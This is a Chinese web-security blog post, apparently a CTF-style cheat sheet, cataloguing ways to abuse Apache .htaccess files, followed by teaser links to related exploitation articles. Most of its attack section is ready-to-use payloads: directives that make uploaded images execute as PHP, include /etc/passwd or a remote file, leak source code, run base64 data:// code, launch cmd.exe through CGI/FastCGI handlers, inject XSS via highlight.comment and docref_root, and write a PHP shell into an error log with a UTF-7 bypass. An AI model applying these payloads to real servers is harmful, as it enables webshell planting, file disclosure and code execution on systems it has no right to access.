.htaccess利用方式

文件解析
文件包含
源码泄露
代码执行
命令执行
XSS
自定义错误文件

文件解析

经常出现在文件上传的黑名单没有限制 .htaceess 后缀，通过上传 .htaccess 文件，再上传图片，使图片的 php 恶意代码得以被解析执行
.htaccess 文件内容有如下两种

(1)SetHandler 指令# 将images.png 当做 PHP 执行
<FilesMatch  "images.png">
SetHandler  application/x-httpd-php
</FilesMatch>

(2)AddType# 将 .jpg(.xxx) 当做 PHP 文件解析
AddType application/x-httpd-php .jpg(.xxx)

文件包含

本地文件包含
通过 php_value 来设置 auto_prepend_file或者 auto_append_file 配置选项包含一些敏感文件，同时在本目录或子目录中需要有可解析的 php 文件来触发
.htaccess 分别通过这两个配置选项来包含 /etc/passwd，并访问同目录下的 index.php文件

auto_prepend_filephp_value auto_prepend_file /etc/passwd

auto_append_filephp_value auto_append_file /etc/passwd

远程文件包含
PHP 的 all_url_include 配置选项这个选项默认是关闭的，如果开启的话就可以远程包含。因为 all_url_include 的配置范围为 PHP_INI_SYSTEM,所以无法利用 php_flag 在 .htaccess 中开启

php_value auto_append_file http://10.87.9.156/phpinfo.txt

源码泄露

利用 php_flag 将 engine 设置为 0,在本目录和子目录中关闭 php 解析,造成源码泄露

php_flag engine 0

代码执行

（1）利用伪协议
all_url_fopen、all_url_include 为 On
（2）解析.htaccess

（1）
php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==
#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B

（2.1）
php_value auto_append_file .htaccess
#<?php phpinfo();
（2.2）
这种适合同目录或子目录没有 php 文件。
需要先设置允许可访问 .htaccess 文件Files ~ "^.ht">Require all grantedOrder allow,denyAllow from all
</Files>将 .htaccess指定当做 php文件处理SetHandler application/x-httpd-php
# <?php phpinfo(); ?>

命令执行

CGI启动

cgi_module 需要加载，即 apache 配置文件中有LoadModule cgi_module modules/mod_cgi.so
.htaccess内容Options ExecCGI #允许CGI执行
AddHandler cgi-script .xx #将xx后缀名的文件，当做CGI程序进行解析
ce.xx#!C:/Windows/System32/cmd.exe /k start calc.exe
6

参考例题

FastCGI启动

mod_fcgid.so需要被加载。即 apache 配置文件中有LoadModule fcgid_module modules/mod_fcgid.so
.htaccessOptions +ExecCGI
AddHandler fcgid-script .xx
FcgidWrapper "C:/Windows/System32/cmd.exe /k start calc.exe" .xxce.xx 内容随意

XSS

highlight_file

.htaccess
php_value highlight.comment '"><script>alert(1);</script>'index.php
<?php
highlight_file(__FILE__);
// comment其中的 highlight.comment 也可以换成如下其他选项

错误消息链接

index.php ：
<?php
include('foo');#foo报错.htaccess
php_flag display_errors 1
php_flag html_errors 1
php_value docref_root "'><script>alert(1);</script>"

自定义错误文件

error.php
<?php include('shell');#报错页面.htaccess
php_value error_log /tmp/www/html/shell.php
php_value include_path "<?php phpinfo(); __halt_compiler();"访问 error.php，会报错并记录在 shell.php 文件中

因为会经过 html 编码，所以需要 UTF-7 来绕过。.htaccess# 第一次
php_value error_log /tmp/shell #定义错误路径
#---- "<?php phpinfo(); __halt_compiler();" in UTF-7:
php_value include_path "+ADw?php phpinfo()+ADs +AF8AXw-halt+AF8-compiler()+ADs"# 第二次
php_value include_path "/tmp" #将include()的默认路径改变
php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"

参考例题

.htaccess利用方式相关推荐

【文件包含漏洞03】文件包含漏洞的空字符绕过及六种利用方式
目录 1 内容简介本节概述实验环境 2 空字符绕过 2.1 实验基础知识 2.2 实验环境及准备 2.3 实验步骤 2.3.1 正常访问 2.3.2 空字符绕过 2.3.3 额外的方式 3 利用方 ...
redis 基于主从复制的 rce 利用方式
在2019年7月7日结束的WCTF2019 Final上,LC/BC的成员Pavel Toporkov在分享会上介绍了一种关于redis新版本的RCE利用方式,比起以前的利用方式来说,这种利用方式更为 ...
windows php cli 后台运行_【续】windows环境redis未授权利用方式梳理
01 Redis未授权产生原因 1.redis绑定在0.0.0.0:6379默认端口,直接暴露在公网,无防火墙进行来源信任防护. 2.没有设置密码认证,可以免密远程登录redis服务 02 漏洞危害 ...
debian 访问 windows 共享_【续】windows环境redis未授权利用方式梳理
01 Redis未授权产生原因 1.redis绑定在0.0.0.0:6379默认端口,直接暴露在公网,无防火墙进行来源信任防护. 2.没有设置密码认证,可以免密远程登录redis服务 02 漏洞危害 ...
文件包含漏洞原理/利用方式/应对方案
原理用户利用文件包含函数上传可执行脚本文件,造成信息泄露或任意命令执行触发点/检测文件包含漏洞的检测需要配合代码审计,重点在文件包含的函数 include() require() include ...
总结windows下堆溢出的三种利用方式
创建时间:2004-04-08 文章属性:转载文章提交:watercloud (watercloud_at_xfocus.org) 原文由Leven发在网络编程版: https://www.xfoc ...
Wget漏洞（CVE-2016-4971）利用方式解析
漏洞描述 wget是一个用来入侵Web服务器并拦截敏感数据的计算机程序.它基于shellshock漏洞对目标进行入侵.(FB注释:wget名称的由来是"World Wide Web" ...
真实IP收集及其利用方式
0x01简介 CDN:全称Content Delivery Network,即内容分发网络,其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输的更快.更稳定.通过在网 ...
浅谈SQL注入漏洞原理及利用方式
1.SQL注入原理: 在数据交互中,前端的数据传入到后台处理时,由于后端没有做严格的判断,导致其传入的恶意"数据"拼接到SQL语句中后,被当作SQL语句的一部分执行.漏洞产生于脚 ...

.htaccess利用方式

.htaccess利用方式

文件解析

文件包含

源码泄露

代码执行

命令执行

XSS

自定义错误文件

.htaccess利用方式相关推荐

最新文章

热门文章